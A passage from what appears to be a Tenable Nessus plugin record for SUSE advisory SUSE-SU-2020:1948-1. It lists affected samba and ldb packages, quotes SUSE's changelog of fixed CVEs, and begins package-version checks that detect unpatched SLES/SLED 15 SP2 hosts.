"p-cpe:/a:novell:suse_linux:libsamdb0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-errors-devel", "p-cpe:/a:novell:suse_linux:libsamba-hostconfig-devel", "p-cpe:/a:novell:suse_linux:python3-ldb", "p-cpe:/a:novell:suse_linux:samba", "p-cpe:/a:novell:suse_linux:libsamba-util0-debuginfo", "p-cpe:/a:novell:suse_linux:libtevent-util-devel", "p-cpe:/a:novell:suse_linux:libwbclient0-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libndr-nbt0-debuginfo", "p-cpe:/a:novell:suse_linux:libdcerpc-samr0", "p-cpe:/a:novell:suse_linux:samba-python3-debuginfo", "p-cpe:/a:novell:suse_linux:libsmbclient0", "p-cpe:/a:novell:suse_linux:samba-winbind-debuginfo", "p-cpe:/a:novell:suse_linux:libsmbclient-devel", "p-cpe:/a:novell:suse_linux:libndr-krb5pac-devel", "p-cpe:/a:novell:suse_linux:libdcerpc0-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:ldb-tools-debuginfo", "p-cpe:/a:novell:suse_linux:libsmbconf0-debuginfo", "p-cpe:/a:novell:suse_linux:libdcerpc-binding0-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-errors0", "p-cpe:/a:novell:suse_linux:libsmbconf-devel", "p-cpe:/a:novell:suse_linux:libdcerpc0-debuginfo", "p-cpe:/a:novell:suse_linux:samba-libs-python3-debuginfo", "p-cpe:/a:novell:suse_linux:libwbclient0", "p-cpe:/a:novell:suse_linux:libsmbconf0", "p-cpe:/a:novell:suse_linux:libsmbldap2-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:samba-winbind", "p-cpe:/a:novell:suse_linux:libsamba-passdb0", "p-cpe:/a:novell:suse_linux:samba-ad-dc", "p-cpe:/a:novell:suse_linux:libsamba-passdb0-debuginfo", "p-cpe:/a:novell:suse_linux:libldb2-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-credentials0-debuginfo", "p-cpe:/a:novell:suse_linux:samba-libs", "p-cpe:/a:novell:suse_linux:libndr-standard0-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libndr-standard-devel", "p-cpe:/a:novell:suse_linux:libsamba-hostconfig0-debuginfo", "p-cpe:/a:novell:suse_linux:samba-client", "p-cpe:/a:novell:suse_linux:libsamba-util0", "p-cpe:/a:novell:suse_linux:libsamba-policy-devel", "p-cpe:/a:novell:suse_linux:samba-libs-debuginfo", "p-cpe:/a:novell:suse_linux:libnetapi0-debuginfo", "p-cpe:/a:novell:suse_linux:samba-ceph-debuginfo", "p-cpe:/a:novell:suse_linux:libtevent-util0-debuginfo"], "id": "SUSE_SU-2020-1948-1.NASL", "href": "https://www.tenable.com/plugins/nessus/138760", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2020:1948-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(138760);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/13\");\n\n script_cve_id(\"CVE-2020-10700\", \"CVE-2020-10704\", \"CVE-2020-10730\", \"CVE-2020-10745\", \"CVE-2020-10760\", \"CVE-2020-14303\");\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : ldb, samba (SUSE-SU-2020:1948-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for ldb, samba fixes the following issues :\n\nChanges in samba: Update to samba 4.11.11\n\n + CVE-2020-10730: NULL de-reference in AD DC LDAP server\n when ASQ and VLV combined; (bso#14364); (bsc#1173159]\n\n + CVE-2020-10745: invalid DNS or NBT queries containing\n dots use several seconds of CPU each; (bso#14378);\n (bsc#1173160).\n\n + CVE-2020-10760: Use-after-free in AD DC Global Catalog\n LDAP server with paged_result or VLV; (bso#14402);\n (bsc#1173161)\n\n + CVE-2020-14303: Endless loop from empty UDP packet sent\n to AD DC nbt_server; (bso#14417); (bsc#1173359).\n\nUpdate to samba 4.11.10\n\n + Fix segfault when using SMBC_opendir_ctx() routine for\n share folder that contains incorrect symbols in any file\n name; (bso#14374).\n\n + vfs_shadow_copy2 doesn't fail case looking in\n snapdirseverywhere mode; (bso#14350)\n\n + ldb_ldap: Fix off-by-one increment in lldb_add_msg_attr;\n (bso#14413).\n\n + Malicous SMB1 server can crash libsmbclient; (bso#14366)\n\n + winbindd: Fix a use-after-free when winbind clients\n exit; (bso#14382)\n\n + ldb: Bump version to 2.0.11, LMDB databases can grow\n without bounds. (bso#14330)\n\nUpdate to samba 4.11.9\n\n + nmblib: Avoid undefined behaviour in handle_name_ptrs();\n (bso#14242).\n\n + 'samba-tool group' commands do not handle group names\n with special chars correctly; (bso#14296).\n\n + smbd: avoid calling vfs_file_id_from_sbuf() if statinfo\n is not valid; (bso#14237).\n\n + Missing check for DMAPI offline status in async DOS\n attributes; (bso#14293).\n\n + smbd: Ignore set NTACL requests which contain S-1-5-88\n NFS ACEs; (bso#14307).\n\n + vfs_recycle: Prevent flooding the log if we're called on\n non-existant paths; (bso#14316)\n\n + smbd mistakenly updates a file's write-time on close;\n (bso#14320).\n\n + RPC handles cannot be differentiated in source3 RPC\n server; (bso#14359).\n\n + librpc: Fix IDL for svcctl_ChangeServiceConfigW;\n (bso#14313).\n\n + nsswitch: Fix use-after-free causing segfault in\n _pam_delete_cred; (bso#14327).\n\n + Fix fruit:time machine max size on arm; (bso#13622)\n\n + CTDB recovery corner cases can cause record resurrection\n and node banning; (bso#14294).\n\n + ctdb: Fix a memleak; (bso#14348).\n\n + libsmb: Don't try to find posix stat info in\n SMBC_getatr().\n\n + ctdb-tcp: Move free of inbound queue to TCP restart;\n (bso#14295); (bsc#1162680).\n\n + s3/librpc/crypto: Fix double free with unresolved\n credential cache; (bso#14344); (bsc#1169095)\n\n + s3:libads: Fix ads_get_upn(); (bso#14336).\n\n + CTDB recovery corner cases can cause record resurrection\n and node banning; (bso#14294)\n\n + Starting ctdb node that was powered off hard before\n results in recovery loop; (bso#14295); (bsc#1162680).\n\n + ctdb-recoverd: Avoid dereferencing NULL rec->nodemap;\n (bso#14324)\n\nUpdate to samba 4.11.8\n\n + CVE-2020-10700: Use-after-free in Samba AD DC LDAP\n Server with ASQ; (bso#14331); (bsc#1169850);\n\n + CVE-2020-10704: LDAP Denial of Service (stack overflow)\n in Samba AD DC; (bso#14334); (bsc#1169851);\n\nUpdate to samba 4.11.7\n\n + s3: lib: nmblib. Clean up and harden nmb packet\n processing; (bso#14239).\n\n + s3: VFS: full_audit. Use system session_info if called\n from a temporary share definition; (bso#14283)\n\n + dsdb: Correctly handle memory in objectclass_attrs;\n (bso#14258).\n\n + ldb: version 2.0.9, Samba 4.11 and later give incorrect\n results for SCOPE_ONE searches; (bso#14270)\n\n + auth: Fix CIDs 1458418 and 1458420 NULL pointer\n dereferences; (bso#14247).\n\n + smbd: Handle EINTR from open(2) properly; (bso#14285)\n\n + winbind member (source3) fails local SAM auth with empty\n domain name; (bso#14247)\n\n + winbindd: Handling missing idmap in getgrgid();\n (bso#14265).\n\n + lib:util: Log mkdir error on correct debug levels;\n (bso#14253).\n\n + wafsamba: Do not use 'rU' as the 'U' is deprecated in\n Python 3.9; (bso#14266).\n\n + ctdb-tcp: Make error handling for outbound connection\n consistent; (bso#14274).\n\nUpdate to samba 4.11.6\n\n + pygpo: Use correct method flags; (bso#14209).\n\n + vfs_ceph_snapshots: Fix root relative path handling;\n (bso#14216); (bsc#1141320).\n\n + Avoiding bad call flags with python 3.8, using\n METH_NOARGS instead of zero; (bso#14209).\n\n + source4/utils/oLschema2ldif: Include stdint.h before\n cmocka.h; (bso#14218).\n\n + docs-xml/winbindnssinfo: Clarify interaction with\n idmap_ad etc; (bso#14122).\n\n + smbd: Fix the build with clang; (bso#14251).\n\n + upgradedns: Ensure lmdb lock files linked; (bso#14199).\n\n + s3: VFS: glusterfs: Reset nlinks for symlink entries\n during readdir; (bso#14182).\n\n + smbc_stat() doesn't return the correct st_mode and also\n the uid/gid is not filled (SMBv1) file; (bso#14101).\n\n + librpc: Fix string length checking in\n ndr_pull_charset_to_null(); (bso#14219).\n\n + ctdb-scripts: Strip square brackets when gathering\n connection info; (bso#14227).\n\nAdd libnetapi-devel to baselibs conf, for wine usage; (bsc#1172307);\n\nInstalling: samba - samba-ad-dc.service does not exist and unit not\nfound; (bsc#1171437);\n\nFix samba_winbind package is installing python3-base without python3\npackage; (bsc#1169521);\n\nChanges in ldb: Update to version 2.0.12\n\n + CVE-2020-10730: NULL de-reference in AD DC LDAP server\n when ASQ and VLV combined; (bso#14364); (bsc#1173159).\n\n + ldb_ldap: fix off-by-one increment in lldb_add_msg_attr;\n (bso#14413).\n\n + lib/ldb: add unit test for ldb_ldap internal code.\n\nUpdate to version 2.0.11\n\n + lib ldb: lmdb init var before calling mdb_reader_check.\n\n + lib ldb: lmdb clear stale readers on write txn start;\n (bso#14330).\n\n + ldb tests: Confirm lmdb free list handling\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1141320\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1162680\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1169095\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1169521\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1169850\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1169851\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1171437\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1172307\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1173159\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1173160\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1173161\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1173359\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1174120\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-10700/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-10704/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-10730/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-10745/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-10760/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-14303/\"\n );\n # https://www.suse.com/support/update/announcement/2020/suse-su-20201948-1\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?35b12723\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Module for Python2 15-SP2 :\n\nzypper in -t patch SUSE-SLE-Module-Python2-15-SP2-2020-1948=1\n\nSUSE Linux Enterprise Module for Basesystem 15-SP2 :\n\nzypper in -t patch SUSE-SLE-Module-Basesystem-15-SP2-2020-1948=1\n\nSUSE Linux Enterprise High Availability 15-SP2 :\n\nzypper in -t patch SUSE-SLE-Product-HA-15-SP2-2020-1948=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ldb-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ldb-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ldb-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-binding0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-binding0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-binding0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-samr-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-samr0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-samr0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libldb-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libldb2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libldb2-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libldb2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-krb5pac-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-krb5pac0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-krb5pac0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-krb5pac0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-nbt-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-nbt0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-nbt0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-nbt0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-standard-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-standard0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-standard0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-standard0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libnetapi-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libnetapi0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libnetapi0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libnetapi0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-credentials-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-credentials0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-credentials0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-credentials0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-errors-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-errors0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-errors0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-errors0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-hostconfig-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-hostconfig0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-hostconfig0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-hostconfig0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-passdb-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-passdb0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-passdb0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-passdb0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-policy-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-policy-python3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-policy0-python3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-policy0-python3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-util-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-util0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-util0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-util0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamdb-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamdb0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamdb0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamdb0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbconf-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbconf0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbconf0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbconf0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbldap-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbldap2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbldap2-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbldap2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libtevent-util-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libtevent-util0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libtevent-util0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libtevent-util0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwbclient0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:python3-ldb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:python3-ldb-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:python3-ldb-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-ad-dc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-ad-dc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-ceph\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-ceph-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-client-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-core-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-dsdb-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-dsdb-modules-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-libs-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-libs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-libs-python3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-libs-python3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-python3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-python3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-winbind-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-winbind-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/05/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED15|SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED15 / SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP2\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED15\" && (! preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED15 SP2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libdcerpc-binding0-32bit-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libdcerpc-binding0-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libdcerpc0-32bit-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libdcerpc0-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libldb2-32bit-2.0.12-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libldb2-32bit-debuginfo-2.0.12-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libndr-krb5pac0-32bit-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libndr-krb5pac0-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libndr-nbt0-32bit-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libndr-nbt0-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libndr-standard0-32bit-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libndr-standard0-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLES15\", 